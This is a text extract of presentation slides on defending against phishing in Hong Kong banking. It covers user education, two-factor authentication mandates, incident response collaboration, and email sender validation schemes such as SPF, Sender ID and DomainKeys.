• Circular on monitoring Online Banking Regulation of Bogus web
site
– Regulating the use of domain name
• HKMA and HKIRC cooperate in regulating the use of words
“bank” and “banque” in “.hk” domain
• Is a further regulation to mandate all authorized banking institutions
to use “.bank.hk” a useful strategy?
– Note: it still cannot stop technique like “Visual Spoofing”

• Human is the weakest link

– Trust too easily

98 (PHISHING )
 3.1 User Education
• Consumer Education
– Pamphlet “Internet Banking – Keeping Your Money
Safe”
• by HKAB(Hong Kong Association of Banks)
http://www.hkab.org.hk/PDF/customer_info/ebanking
_e.pdf
– TV and Radio programs
• by HKMA and HKPF
– Public seminars
• by HKCERT
– Alerts on some bank web sites

99 (PHISHING )
 3.2 Prevention Technical
• HKMA announced in June 2004 that within
12 months, all authorized institutions should
deploy two-factor authentication in high
risk transactions
– One time password (e.g. secure ID token, SMS
one time password)
– Digital certificate in Smart ID Card

100 (PHISHING )
 3.2 Other Prevention & Detection
• See previous sections on specific attacks

101 (PHISHING )
 3.4 Incident Response and
Collaboration
• Report and Alert
– SFC (Security and Futures Commission) reward the report
of fraudulent copycat websites and phishing scams
targeting Hong Kong investors.
• Smart Investor Award
http://www.hksfc.org.hk/eng/investor/html/smart_investor_award.h
tm

– HKMA and SFC publish Unregistered financial and stock

transaction web site
• http://www.hkma.gov.hk
• http://www.hksfc.org.hk/chi/investor/html/unlicensed_overseas_comp.htm

– Quick reaction and publishing of news in Media and Press

102 to alert the public
(PHISHING )
 3.4 Incident Response and
Collaboration
• Local Collaboration

– Police, HKCERT and ISPs cooperating to close down

bogus web sites in Hong Kong

– Police, HKMA and HKAB has standing collaboration

body, meeting regularly on banking fraud prevention
and response

103 (PHISHING )
 3.4 Incident Response and
Collaboration
• Cross Border Collaboration
– Police plays an important role in cross-border crimes like phishing
– CERT Teams around the world are developing close collaboration in
information exchange and pin down of bogus website

Global
Asia Pacific

104 (PHISHING ) http://www.cert.org/csirts/images/map-full.gif

 3.5 Long Term Development
(Technology Infrastructure)
PHISHING & SPAM
One of the Core Issues:
How to validate identity of Sender and Sender Domain,
and if the Sending Mail Server is authorized?
• In the current Internet Mail Infrastructure implementation, there is flaw in
the validation of sender

Plausible but not widely implemented methods of validation

• Sender Validation
– Use Digital Signature (S/MIME or PGP)

• Authenticated SMTP to minimize abuse of Open Mail Relay

– RFC2554 - SMTP Service Extension for Authentication
– RFC2487 - SMTP Service Extension for Secure SMTP over TLS

105 (PHISHING )
 3.5 Long Term Development
(Technology Infrastructure)
• Domain Validation (work at DNS level)
– Standard based
• Reverse DNS Lookup

– Proprietary Solution
• AOL: SPF Sender ID
• Microsoft: Caller ID
• Yahoo: Domain Keys

106 (PHISHING )
 Sender Policy Framework SPF

DNS server of
SENDER.COM

2. Recipient Mail Gateway 3. DNS server returns a list of

issues a DNS query to authorized IP addresses of
SENDER.COM, asking for mail servers for
the list of authorized IP
addresses of mail servers
? SENDER.COM

4.Check if the Sender Mail Server is

in the authorized IP address.
If so, the mail server is authorized
and mail is forwarded to recipient’s
1.Sender sends out email
from SENDER.COM mailbox

SMTP

Sender Recipient
Mail Server Mail Gateway Recipient
107 (PHISHING )
 Proprietary Domain Validation
• Caller ID
– “XML version of SPF” with more options
• Domain Keys
– Use PKI. Validate sender identity AND message
integrity

• Recent Development
– Domain Keys was submitted as RFC to IETF
– SPF merge with Caller ID to Sender ID.
– SenderID submitted to IETF as RFC in July 2004; got
rejected in Oct 2004 due to compatibility and IP issue.
Microsoft had re-submitted with amendment. The
industry is still discussing the new amendment.

108 (PHISHING )
 3.5 Long Term Development
(Legislation)
PHISHING & SPAM

– Legislate on cross-border jurisdiction, and

establish mutually accepted process to handle
phishing and spamming

– Legislate on anti-spam, to reduce Open Mail Relay

and Directory Harvesting Attacks

109 (PHISHING )
 Conclusion

• Phishing adversely impacts the growth of e-Commerce

• Phishermen are using both old social engineering tricks
and more advanced technologies now.
• Should adopt Multi-dimensional Anti-Phishing Strategies
– User Education, Prevention, Detection, Incident Response and
Notification
– Collaboration of Law Enforcement and Business sector, and
crossing the border are vital elements of success.

• Hit SPAM can hit Phishing. There is a need for legislative

and technological reforms.

110 (PHISHING )